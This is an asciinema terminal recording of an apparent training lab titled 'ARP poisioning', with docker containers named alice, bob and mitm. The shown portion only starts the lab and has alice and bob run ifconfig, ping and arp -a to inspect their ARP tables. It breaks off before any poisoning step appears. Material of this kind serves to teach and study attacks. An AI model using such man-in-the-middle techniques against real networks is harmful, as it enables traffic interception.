{"version": 2, "width": 141, "height": 31, "timestamp": 1674218573, "env": {"SHELL": "/usr/local/bin/bash", "TERM": "xterm-256color"}, "title": "ARP poisioning"}
[1.219932, "o", "\u001b[?2004h\u001b[38;5;250m\u001b[48;5;240m .../prj/cydrill/arp \u001b[38;5;240m\u001b[49m\u001b[0m "]
[2.19075, "o", "m"]
[2.388264, "o", "a"]
[2.543496, "o", "k"]
[2.683629, "o", "e"]
[2.791223, "o", " "]
[2.949938, "o", "r"]
[3.069309, "o", "u"]
[3.297183, "o", "n"]
[3.880653, "o", "\r\n"]
[3.880823, "o", "\u001b[?2004l\r"]
[3.891019, "o", "docker compose up -d\r\n"]
[4.056284, "o", "\u001b[1A\u001b[1B\u001b[0G\u001b[?25l[+] Running 4/0\r\n"]
[4.05651, "o", "\u001b[34m ⠿ Container arp-alice-1  Running                                                                                                       0.0s\r\n\u001b[0m\u001b[34m ⠿ Container arp-tmux-1   Running                                                                                                       0.0s\r\n\u001b[0m\u001b[34m ⠿ Container arp-mitm-1   Running                                                                                                       0.0s\r\n\u001b[0m\u001b[34m ⠿ Container arp-bob-1    Running                                                                                                       0.0s\r\n\u001b[0m\u001b[?25h"]
[4.06285, "o", "docker compose restart tmux -t 0\r\n"]
[4.290884, "o", "\u001b[1A\u001b[1B\u001b[0G\u001b[?25l[+] Running 0/0\r\n"]
[4.291011, "o", "\u001b[37m ⠋ Container arp-tmux-1  Restarting                                                                                                     0.1s\r\n\u001b[0m\u001b[?25h"]
[4.39062, "o", "\u001b[1A\u001b[1A\u001b[0G\u001b[?25l[+] Running 0/1\r\n\u001b[37m ⠙ Container arp-tmux-1  Restarting                                                                                                     0.2s\r\n\u001b[0m\u001b[?25h"]
[4.49051, "o", "\u001b[1A\u001b[1A\u001b[0G\u001b[?25l[+] Running 0/1\r\n\u001b[37m ⠹ Container arp-tmux-1  Restarting                                                                                                     0.3s\r\n\u001b[0m\u001b[?25h"]
[4.590705, "o", "\u001b[1A\u001b[1A\u001b[0G\u001b[?25l[+] Running 0/1\r\n\u001b[37m ⠸ Container arp-tmux-1  Restarting                                                                                                     0.4s\r\n\u001b[0m\u001b[?25h"]
[4.5975, "o", "\u001b[1A\u001b[1A\u001b[0G\u001b[?25l\u001b[34m[+] Running 1/1\u001b[0m\r\n\u001b[34m ⠿ Container arp-tmux-1  Started                                                                                                        0.4s\r\n\u001b[0m\u001b[?25h"]
[4.60573, "o", "docker exec -e SLEEP=0.07 -it arp-tmux-1 ./demo.sh\r\n"]
[4.787294, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;31r\u001b[>c\u001b[>q\u001b[1;1H"]
[4.789072, "o", "\u001b[?25l\u001b[71C\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[1;71H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[1;73H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[17;71H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[17;73H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:docker*                                                                                                       \"tmux\" 12:42 20-Jan-23\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[?7727h"]
[4.7893, "o", "\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;31r\u001b[1;1H"]
[4.791677, "o", "\u001b[?25l\u001b[71C\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[1;71H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[1;73H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[17;71H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[17;73H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:docker*                                                                                                       \"tmux\" 12:42 20-Jan-23\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H"]
[4.893874, "o", "[10.5.0.2] alice / # #\u001b[?2004h"]
[4.897741, "o", "\u001b[H[10.5.0.2] alice / # #\u001b[49X\u001b[17;1H[10.5.0.3] bob / # \u001b[1;23H"]
[4.898281, "o", "\u001b[17;1H[10.5.0.3] bob / # \u001b[52X\u001b[1;23H"]
[4.900558, "o", "\u001b[50C\u001b[34m\u001b[1m\u001b(0lqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b[2;73H\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;23H"]
[4.902823, "o", "\u001b[?25l\u001b[49C\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;23H"]
[4.934762, "o", " "]
[4.952682, "o", "\u001b[17;73H\u001b[34m\u001b[1m\u001b(0lqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b[18;73H\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;24H"]
[4.954773, "o", "\u001b[?25l\u001b[48C\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;24H\u001b[18;73H\u001b[K\u001b[34m\u001b[1m\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;24H"]
[5.010378, "o", "c"]
[5.03554, "o", "\u001b[17;1H[\u001b[70X\u001b[H[10.5.0.2] alic\u001b[56X"]
[5.036572, "o", "e / # # c\u001b[17;2H10.5.0.3] bob / # \u001b[1;25H"]
[5.040599, "o", "\u001b[2;73H\u001b[K\u001b[34m\u001b[1m\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;25H"]
[5.042377, "o", "\u001b[18;73H\u001b[K\u001b[34m\u001b[1m\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;25H"]
[5.086525, "o", "h"]
[5.161553, "o", "e"]
[5.235883, "o", "c"]
[5.311836, "o", "k"]
[5.385997, "o", "i"]
[5.461269, "o", "n"]
[5.538175, "o", "g"]
[5.61523, "o", " "]
[5.688351, "o", "n"]
[5.764204, "o", "e"]
[5.840701, "o", "t"]
[5.916627, "o", "w"]
[5.993219, "o", "o"]
[6.070108, "o", "r"]
[6.143352, "o", "k"]
[6.146172, "o", "\r\n\u001b[?2004l"]
[6.148825, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[6.222517, "o", "i"]
[6.297448, "o", "f"]
[6.369322, "o", "c"]
[6.445484, "o", "o"]
[6.52161, "o", "n"]
[6.595238, "o", "f"]
[6.670819, "o", "i"]
[6.746519, "o", "g"]
[6.821633, "o", " "]
[6.897447, "o", "e"]
[6.972339, "o", "t"]
[7.047161, "o", "h"]
[7.122616, "o", "0"]
[7.198206, "o", " "]
[7.274445, "o", "|"]
[7.349607, "o", " "]
[7.422229, "o", "h"]
[7.498975, "o", "e"]
[7.573532, "o", "a"]
[7.649181, "o", "d"]
[7.725924, "o", " "]
[7.800411, "o", "-"]
[7.876409, "o", "2"]
[7.879564, "o", "\r\n\u001b[?2004l"]
[7.880597, "o", "eth0      Link encap:Ethernet  HWaddr 02:42:0A:05:00:02  \r\n          inet addr:10.5.0.2  Bcast:10.5.255.255  Mask:255.255.0.0\r\n"]
[7.884184, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[7.95479, "o", "#"]
[8.032463, "o", " "]
[8.107938, "o", "p"]
[8.182725, "o", "i"]
[8.259174, "o", "n"]
[8.334569, "o", "g"]
[8.410616, "o", " "]
[8.485121, "o", "B"]
[8.558886, "o", "O"]
[8.63579, "o", "B"]
[8.711278, "o", " "]
[8.787688, "o", "t"]
[8.86244, "o", "o"]
[8.938094, "o", " "]
[9.014564, "o", "f"]
[9.088951, "o", "i"]
[9.164755, "o", "l"]
[9.240961, "o", "l"]
[9.319136, "o", " "]
[9.395056, "o", "A"]
[9.470219, "o", "R"]
[9.545486, "o", "P"]
[9.620445, "o", " "]
[9.697321, "o", "t"]
[9.772794, "o", "a"]
[9.845676, "o", "b"]
[9.921549, "o", "l"]
[9.996507, "o", "e"]
[9.998428, "o", "\r\n\u001b[?2004l"]
[10.002126, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[10.075433, "o", "p"]
[10.149637, "o", "i"]
[10.22512, "o", "n"]
[10.300242, "o", "g"]
[10.375037, "o", " "]
[10.451837, "o", "1"]
[10.52596, "o", "0"]
[10.603723, "o", "."]
[10.678703, "o", "5"]
[10.752365, "o", "."]
[10.827775, "o", "0"]
[10.903731, "o", "."]
[10.980097, "o", "3"]
[11.053479, "o", " "]
[11.126855, "o", "-"]
[11.202962, "o", "c"]
[11.278435, "o", " "]
[11.353126, "o", "1"]
[11.355604, "o", "\r\n\u001b[?2004l"]
[11.356086, "o", "PING 10.5.0.3 (10.5.0.3): 56 data bytes\r\n"]
[11.357065, "o", "64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[10;1H--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\r\n"]
[11.360437, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[11.430573, "o", "#"]
[11.506123, "o", " "]
[11.58111, "o", "c"]
[11.658192, "o", "h"]
[11.734125, "o", "e"]
[11.809339, "o", "c"]
[11.885399, "o", "k"]
[11.960878, "o", "i"]
[12.036121, "o", "n"]
[12.111474, "o", "g"]
[12.187372, "o", " "]
[12.263712, "o", "A"]
[12.338048, "o", "R"]
[12.412989, "o", "P"]
[12.48983, "o", " "]
[12.564913, "o", "t"]
[12.642495, "o", "a"]
[12.716827, "o", "b"]
[12.79201, "o", "l"]
[12.866996, "o", "e"]
[12.869853, "o", "\r\n\u001b[?2004l"]
[12.871824, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[12.946135, "o", "#"]
[13.021836, "o", "#"]
[13.098068, "o", "#"]
[13.170185, "o", "#"]
[13.247735, "o", "#"]
[13.324509, "o", " "]
[13.398835, "o", "A"]
[13.474524, "o", "R"]
[13.550252, "o", "P"]
[13.626346, "o", " "]
[13.70113, "o", "t"]
[13.775117, "o", "a"]
[13.852159, "o", "b"]
[13.928078, "o", "l"]
[14.002484, "o", "e"]
[14.078932, "o", " "]
[14.152429, "o", "#"]
[14.228705, "o", "#"]
[14.30481, "o", "#"]
[14.380538, "o", "#"]
[14.454744, "o", "#"]
[14.457369, "o", "\r\n\u001b[?2004l"]
[14.459831, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[14.533561, "o", "a"]
[14.609014, "o", "r"]
[14.684058, "o", "p"]
[14.761142, "o", " "]
[14.836408, "o", "-"]
[14.912992, "o", "a"]
[14.915129, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # ifconfig eth0 | head -2\u001b[27X\r\neth0      Link encap:Ethernet  HWaddr 02:42:0A:05:00:02  \u001b[14X\r\n          inet addr:10.5.0.2  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[5X\r\n[10.5.0.2] alice / # # ping BOB to fill ARP table\u001b[22X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[8;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[14;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[14.916327, "o", "\u001b[?25l\u001b[Heth0      Link encap:Ethernet  HWaddr 02:42:0A:05:00:02  \u001b[14X\r\n          inet addr:10.5.0.2  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[5X\r\n[10.5.0.2] alice / # # ping BOB to fill ARP table\u001b[22X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[7;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[13;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[14.91672, "o", "\u001b[?25l\u001b[H          inet addr:10.5.0.2  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[5X\r\n[10.5.0.2] alice / # # ping BOB to fill ARP table\u001b[22X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[6;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[12;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[14.920114, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[14.991254, "o", "#"]
[15.066137, "o", " "]
[15.141353, "o", "c"]
[15.214926, "o", "h"]
[15.290516, "o", "e"]
[15.366149, "o", "c"]
[15.441198, "o", "k"]
[15.516299, "o", " "]
[15.589896, "o", "B"]
[15.665436, "o", "O"]
[15.738669, "o", "B"]
[15.814539, "o", "'"]
[15.891164, "o", "s"]
[15.965973, "o", " "]
[16.04118, "o", "M"]
[16.116169, "o", "A"]
[16.192825, "o", "C"]
[16.267512, "o", " "]
[16.343413, "o", "a"]
[16.417871, "o", "d"]
[16.491676, "o", "d"]
[16.567386, "o", "r"]
[16.642242, "o", "e"]
[16.717164, "o", "s"]
[16.792457, "o", "s"]
[16.79582, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # # ping BOB to fill ARP table\u001b[22X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[5;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[11;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[16.798051, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[16.868591, "o", "\u001b[17;20Hi\u001b[15;22H"]
[16.944396, "o", "\u001b[17;21Hf\u001b[2A"]
[17.019038, "o", "\u001b[2Bc\u001b[15;22H"]
[17.094718, "o", "\u001b[17;23Ho\u001b[15;22H"]
[17.170121, "o", "\u001b[17;24Hn\u001b[15;22H"]
[17.246014, "o", "\u001b[17;25Hf\u001b[15;22H"]
[17.32052, "o", "\u001b[17;26Hi\u001b[15;22H"]
[17.394055, "o", "\u001b[17;27Hg\u001b[15;22H"]
[17.469776, "o", "\u001b[17;28H \u001b[15;22H"]
[17.544933, "o", "\u001b[17;29He\u001b[15;22H"]
[17.62013, "o", "\u001b[17;30Ht\u001b[15;22H"]
[17.695097, "o", "\u001b[17;31Hh\u001b[15;22H"]
[17.772106, "o", "\u001b[17;32H0\u001b[15;22H"]
[17.846713, "o", "\u001b[17;33H \u001b[15;22H"]
[17.92391, "o", "\u001b[17;34H|\u001b[15;22H"]
[17.998712, "o", "\u001b[17;35H \u001b[15;22H"]
[18.074449, "o", "\u001b[17;36Hh\u001b[15;22H"]
[18.149504, "o", "\u001b[17;37He\u001b[15;22H"]
[18.225759, "o", "\u001b[17;38Ha\u001b[15;22H"]
[18.298778, "o", "\u001b[17;39Hd\u001b[15;22H"]
[18.374388, "o", "\u001b[17;40H \u001b[15;22H"]
[18.451172, "o", "\u001b[17;41H-\u001b[15;22H"]
[18.525873, "o", "\u001b[17;42H2\u001b[15;22H"]
[18.529771, "o", "\u001b[18;1Heth0      Link encap:Ethernet  HWaddr 02:42:0A:05:00:03  \r\n          inet addr:10.5.0.3  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[15;22H"]
[18.532136, "o", "\u001b[20;1H[10.5.0.3] bob / # \u001b[15;22H"]
[18.604382, "o", "\u001b[20;20H#\u001b[15;22H"]
[18.679956, "o", "\u001b[20;21H \u001b[5A"]
[18.757039, "o", "\u001b[5Bp\u001b[15;22H"]
[18.830141, "o", "\u001b[20;23Hi\u001b[15;22H"]
[18.907087, "o", "\u001b[20;24Hn\u001b[15;22H"]
[18.982994, "o", "\u001b[20;25Hg\u001b[15;22H"]
[19.05939, "o", "\u001b[20;26H \u001b[15;22H"]
[19.135316, "o", "\u001b[20;27HA\u001b[15;22H"]
[19.209723, "o", "\u001b[20;28HL\u001b[15;22H"]
[19.286506, "o", "\u001b[20;29HI\u001b[15;22H"]
[19.36135, "o", "\u001b[20;30HC\u001b[15;22H"]
[19.437488, "o", "\u001b[20;31HE\u001b[15;22H"]
[19.512416, "o", "\u001b[20;32H \u001b[15;22H"]
[19.58694, "o", "\u001b[20;33Ht\u001b[15;22H"]
[19.661998, "o", "\u001b[20;34Ho\u001b[15;22H"]
[19.73718, "o", "\u001b[20;35H \u001b[15;22H"]
[19.789133, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[31;1H[demo] 0:docker*                                                                                                       \"tmux\" 12:43 20-Jan-23\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[15;22H"]
[19.813645, "o", "\u001b[20;36Hf\u001b[15;22H"]
[19.89008, "o", "\u001b[20;37Hi\u001b[15;22H"]
[19.964721, "o", "\u001b[20;38Hl\u001b[15;22H"]
[20.040431, "o", "\u001b[20;39Hl\u001b[15;22H"]
[20.115504, "o", "\u001b[20;40H \u001b[15;22H"]
[20.192262, "o", "\u001b[20;41HA\u001b[15;22H"]
[20.265654, "o", "\u001b[20;42HR\u001b[15;22H"]
[20.339853, "o", "\u001b[20;43HP\u001b[15;22H"]
[20.416642, "o", "\u001b[20;44H \u001b[15;22H"]
[20.492132, "o", "\u001b[20;45Ht\u001b[15;22H"]
[20.566882, "o", "\u001b[20;46Ha\u001b[15;22H"]
[20.643437, "o", "\u001b[20;47Hb\u001b[15;22H"]
[20.717837, "o", "\u001b[20;48Hl\u001b[15;22H"]
[20.794898, "o", "\u001b[20;49He\u001b[15;22H"]
[20.799764, "o", "\u001b[21;1H[10.5.0.3] bob / # \u001b[15;22H"]
[20.872344, "o", "\u001b[21;20Hp\u001b[15;22H"]
[20.948529, "o", "\u001b[21;21Hi\u001b[6A"]
[21.024972, "o", "\u001b[6Bn\u001b[15;22H"]
[21.103567, "o", "\u001b[21;23Hg\u001b[15;22H"]
[21.176614, "o", "\u001b[21;24H \u001b[15;22H"]
[21.253209, "o", "\u001b[21;25H1\u001b[15;22H"]
[21.328213, "o", "\u001b[21;26H0\u001b[15;22H"]
[21.402898, "o", "\u001b[21;27H.\u001b[15;22H"]
[21.47927, "o", "\u001b[21;28H5\u001b[15;22H"]
[21.553865, "o", "\u001b[21;29H.\u001b[15;22H"]
[21.626649, "o", "\u001b[21;30H0\u001b[15;22H"]
[21.7027, "o", "\u001b[21;31H.\u001b[15;22H"]
[21.777899, "o", "\u001b[21;32H2\u001b[15;22H"]
[21.852461, "o", "\u001b[21;33H \u001b[15;22H"]
[21.925666, "o", "\u001b[21;34H-\u001b[15;22H"]
[22.000468, "o", "\u001b[21;35Hc\u001b[15;22H"]
[22.075933, "o", "\u001b[21;36H \u001b[15;22H"]
[22.150507, "o", "\u001b[21;37H1\u001b[15;22H"]
[22.153637, "o", "\u001b[22;1HPING 10.5.0.2 (10.5.0.2): 56 data bytes\r\n64 bytes from 10.5.0.2: seq=0 ttl=64 time=0.123 ms\u001b[25;1H--- 10.5.0.2 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\r\nround-trip min/avg/max = 0.123/0.123/0.123 ms\u001b[15;22H"]
[22.156476, "o", "\u001b[28;1H[10.5.0.3] bob / # \u001b[15;22H"]
[22.230119, "o", "\u001b[28;20H#\u001b[15;22H"]
[22.306222, "o", "\u001b[28;21H \u001b[13A"]
[22.383517, "o", "\u001b[28dc\u001b[15;22H"]
[22.458917, "o", "\u001b[28;23Hh\u001b[15;22H"]
[22.5337, "o", "\u001b[28;24He\u001b[15;22H"]
[22.610442, "o", "\u001b[28;25Hc\u001b[15;22H"]
[22.684979, "o", "\u001b[28;26Hk\u001b[15;22H"]
[22.759294, "o", "\u001b[28;27Hi\u001b[15;22H"]
[22.835277, "o", "\u001b[28;28Hn\u001b[15;22H"]
[22.907087, "o", "\u001b[28;29Hg\u001b[15;22H"]
[22.983716, "o", "\u001b[28;30H \u001b[15;22H"]
[23.060492, "o", "\u001b[28;31HA\u001b[15;22H"]
[23.135342, "o", "\u001b[28;32HR\u001b[15;22H"]
[23.21098, "o", "\u001b[28;33HP\u001b[15;22H"]
[23.285683, "o", "\u001b[28;34H \u001b[15;22H"]
[23.362227, "o", "\u001b[28;35Ht\u001b[15;22H"]
[23.437525, "o", "\u001b[28;36Ha\u001b[15;22H"]
[23.513719, "o", "\u001b[28;37Hb\u001b[15;22H"]
[23.588292, "o", "\u001b[28;38Hl\u001b[15;22H"]
[23.667418, "o", "\u001b[28;39He\u001b[15;22H"]
[23.673853, "o", "\u001b[29;1H[10.5.0.3] bob / # \u001b[15;22H"]
[23.746477, "o", "\u001b[29;20H#\u001b[15;22H"]
[23.822825, "o", "\u001b[29;21H#\u001b[14A"]
[23.899372, "o", "\u001b[29d#\u001b[15;22H"]
[23.974077, "o", "\u001b[29;23H#\u001b[15;22H"]
[24.048178, "o", "\u001b[29;24H#\u001b[15;22H"]
[24.123957, "o", "\u001b[29;25H \u001b[15;22H"]
[24.197718, "o", "\u001b[29;26HA\u001b[15;22H"]
[24.273125, "o", "\u001b[29;27HR\u001b[15;22H"]
[24.348784, "o", "\u001b[29;28HP\u001b[15;22H"]
[24.425835, "o", "\u001b[29;29H \u001b[15;22H"]
[24.49982, "o", "\u001b[29;30Ht\u001b[15;22H"]
